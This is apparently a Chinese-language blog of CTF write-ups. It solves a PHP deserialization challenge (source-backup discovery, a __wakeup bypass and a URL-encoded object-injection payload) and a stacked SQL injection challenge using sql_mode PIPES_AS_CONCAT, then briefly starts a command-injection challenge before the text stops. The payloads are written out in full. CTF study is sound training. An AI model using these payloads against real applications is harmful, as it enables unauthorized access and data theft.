[极客大挑战 2019]PHP
题目给出提示说因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯不愧是我!!!
,这就马上想到源码备份泄露的问题,一般网站的源码备份一般放在根目录的www.zip,当然还有各种后缀比如说.bak等等,先试下那常见的几个,如果都没找到那就没找到吧哈哈,当然你也可以用dirsearch工具扫描后台
常见的网站源码备份文件名
- web
- website
- backup
- back
- www
- wwwroot
- temp
比如说index.php.bak
然后将源码dowm下来之后就可以审计源码了
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EipOaOV5-1639236802295)(C:/Users/86185/AppData/Roaming/Typora/typora-user-images/image-20211211225949381.png)]
可以看到有三个php文件,分别打开审计一下
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>
<!DOCTYPE html>
<head>
<meta charset="UTF-8">
<title>I have a cat!</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel="stylesheet" href="style.css">
</head>
<style>
#login{
position: absolute;
top: 50%;
left:50%;
margin: -150px 0 0 -150px;
width: 300px;
height: 300px;
}
h4{
font-size: 2em;
margin: 0.67em 0;
}
</style>
<body>
<div id="world">
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯
</div>
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我!!!
</div>
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
</div>
<div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>
<script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>
<script src="index.js"></script>
</body>
</html>
可以看到在index.php里面
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
存在一个反序列化漏洞,传入一个select参数,并将其进行一次反序列化,这里包含了class.php文件,所以直接在class.php进行审计
这里只有一个Name类,里面有两个属性分别为username和password,然后我们进行反序列化的时候会自动触发wakeup和destruct方法,首先要找到将要执行的点,显然是destruct里面的那两条判断条件,当password的值不为100的时候die(),所以必须要让password的值为100,然后当usernamde的值为admin的时候,输出flag的值
所以构造出的exp
<?php
class Name{
private $username = 'admin';
private $password = '100';
}
$a=new Name();
echo urlencode(serialize($a));
?>
这里因为这两个属性都是private
,所以直接打印出来的话就会存在不可见字符,复制的时候会复制不完整,所以我将它进行了一次URL编码,然后等上传到服务器的时候会自动进行一次URL解码
这里还要注意一个点
就会要绕过wakeup这个魔术方法,因为他会将我们修改的username这个属性的值变为guest,而绕过这个wakeup方法的方法就是将这个反序列化数据中那个wakeup位于的类的所含属性个数修改为大于本来就有的个数
比如说这道题有两个属性,然后为了绕过它你就要将属性的个数修改为3及以上的值
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
=>
O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
然后构造出payload如下
?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
[SUCTF 2019]EasySQL
传入参数判断是否有注入点
发现只有传入非0数字才会有回显,且回显为1,当传入1=2的时候回显0,而且大部分的命令都被禁用了,比如说and or
综合以上的过滤信息看的话基本上就是什么报错,时间盲注都不能进行了
所以我们尝试一下其他的骚操作,比如说堆叠注入
1;show databases;
1;use ctf;
!
发现这个flag就在CTF那个数据库里面,但是当执行show columns from flag的时候发现回显了nonono,这是因为过滤了from 和 flag这个,所以只能换一种思路了,根据官方的WP就是根据现在已有的条件对这个后端的源代码进行猜测
通过输入非0数字回显为1,其他的0或者字母不回显判断出可能存在||管道符
然后通过堆叠注入判断出它查询的那个表就是flag
即
select post[‘query’] ||flag from Flag;
然后接下来就有两种解法
-
*,1
相当于select *,1||flag from Flag
也就是将flag表中的所有内容打印出来
-
query=2;set sql_mode=PIPES_AS_CONCAT;select 2
这里就是修改了一下sql_mode的值,也就是让||这个管道符的作用编程字符串连接的作用,类似于concat
具体的sql_mode的那些值有哪些以及他们各自的作用可以自行搜索
总之这道题的难点就是要你去猜他的后端源码
[ACTF2020 新生赛]Exec
一道rce的题,尝试一下ls
发现有回显,且flag就在文件根目录下,然后看下能不能直接通过cat命令输出出来
很显然可以